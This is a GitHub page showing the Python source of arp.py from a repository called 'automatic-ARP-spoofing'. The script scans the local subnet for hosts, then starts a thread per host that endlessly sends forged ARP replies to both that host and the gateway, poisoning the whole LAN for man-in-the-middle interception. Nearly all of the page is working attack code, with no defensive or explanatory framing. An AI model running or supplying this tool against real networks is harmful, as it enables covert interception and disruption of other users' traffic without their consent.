automatic-ARP-spoofing/arp.py at master · KarelZhang/automatic-ARP-spoofing · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
# encoding: utf-8
# -*- coding: utf8 -*-

import os
import sys
import threading
import time

try:
    import netifaces
except ImportError:
    try:
        command_to_execute = "pip install netifaces || easy_install netifaces"
        os.system(command_to_execute)
    except OSError:
        print "Can NOT install netifaces, Aborted!"
        sys.exit(1)
    import netifaces

try:
    from scapy.all import srp, Ether, ARP, conf,sendp,fuzz,send
except ImportError:
    try:
        command_to_execute = "pip install scapy"
        os.system(command_to_execute)
    except OSError:
        print "Can NOT install scapy, Aborted!"
        sys.exit(1)
    from scapy.all import srp, Ether, ARP, conf,sendp,fuzz,send


def get_network_infor():

    print "******************* start to get basic local network information ********************* "
    print

    #网关IP
    gatewayIP = netifaces.gateways()['default'][netifaces.AF_INET][0]
    #网卡名字
    routingNicName = netifaces.gateways()['default'][netifaces.AF_INET][1]

    for interface in netifaces.interfaces():
        if interface == routingNicName:
            # print netifaces.ifaddresses(interface)
            #本地MAC
            localMacAddr = netifaces.ifaddresses(interface)[netifaces.AF_LINK][0]['addr']
            try:
                #本地IP
                localIPAddr = netifaces.ifaddresses(interface)[netifaces.AF_INET][0]['addr']
                # TODO(Guodong Ding) Note: On Windows, netmask maybe give a wrong result in 'netifaces' module.
                #子网掩码
                IPNetmask = netifaces.ifaddresses(interface)[netifaces.AF_INET][0]['netmask']
            except KeyError:
                pass

    print "[*]get gatewayIP: " + gatewayIP
    print "[*]get localIP  : " + localIPAddr
    print "[*]get localMac : " + localMacAddr
    print "[*]get IPNetmask: " + IPNetmask
    print
    print "******************* finish to get basic local network information ********************* "

    #网关IP、本地IP、本地MAC、子网掩码
    return str(gatewayIP),str(localIPAddr),str(localMacAddr),str(IPNetmask)


def get_netmask_len(netmask):

    result = ""

    for num in netmask.split('.'):

        temp = str(bin(int(num)))[2:]

        result = result + temp

    netmask_len=len("".join(str(result).split('0')[0:1]))

    return netmask_len


def create_lan(localIP,netmask_lan):

    lan=str(localIP) + '/' + str(netmask_lan)

    print "[*]lan has creted: " + lan

    return lan


def get_ip_mac(lan):

    print "******************* start to get IP-MAC ********************* "
    print

    ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=lan), timeout=2)
    for snd, rcv in ans:
        cur_mac = rcv.sprintf("%Ether.src%")
        cur_ip  = rcv.sprintf("%ARP.psrc%")
        print cur_mac + ' - ' +cur_ip
        ipTable.append(cur_ip)
        macTable.append(cur_mac)

    print
    print "******************* finish to get IP-MAC ********************* "


def get_gateway_mac(gate_ip):

    gateway_mac=''

    for i in range(len(ipTable)):

        if ipTable[i]==gate_ip:

            gateway_mac=macTable[i]
            del ipTable[i]
            del macTable[i]
            break
    return str(gateway_mac)


def create_arp_reply_packet(src_mac,des_mac,fake_src_ip,des_ip):

    eth = Ether(src=src_mac, dst=des_mac)
    arp = ARP(hwsrc=src_mac, psrc=fake_src_ip, hwdst=des_mac, pdst=des_ip, op=2)
    pkt = eth / arp

    return pkt


def send_to_target(gateway_mac,host_mac,local_mac,gateway_ip,host_ip,local_ip):

    print "********* "+ str(host_ip) +" thread start ***********"

    packet_to_host=create_arp_reply_packet(local_mac,host_mac,gateway_ip,host_ip)

    packet_to_gateway=create_arp_reply_packet(local_mac,gateway_mac,host_ip,gateway_ip)

    while 1:

        sendp(packet_to_host)
        time.sleep(0.5)

        sendp(packet_to_gateway)
        time.sleep(0.5)


def arp_target_helper(gatewayMAC,gatewayIP,localMAC,localIP):

    for i in range(len(ipTable)):

        thread = threading.Thread(target=send_to_target, args=(gatewayMAC,macTable[i],localMAC,gatewayIP,ipTable[i],localIP))
        thread.start()


#程序从这里开始

#ip表
ipTable=[]
#mac表
macTable=[]


#网关IP、本地IP、本地MAC、子网掩码
gatewayIP ,localIP ,localMac ,IPNetmask = get_network_infor()

#lan
lan=create_lan(gatewayIP,get_netmask_len(IPNetmask))

#获取IP-MAC
get_ip_mac(lan)


#获取网关MAC，并将网关信息从表中删除
gatewayMAC=get_gateway_mac(gatewayIP)


#启动程序
arp_target_helper(gatewayMAC,gatewayIP,localMac,localIP)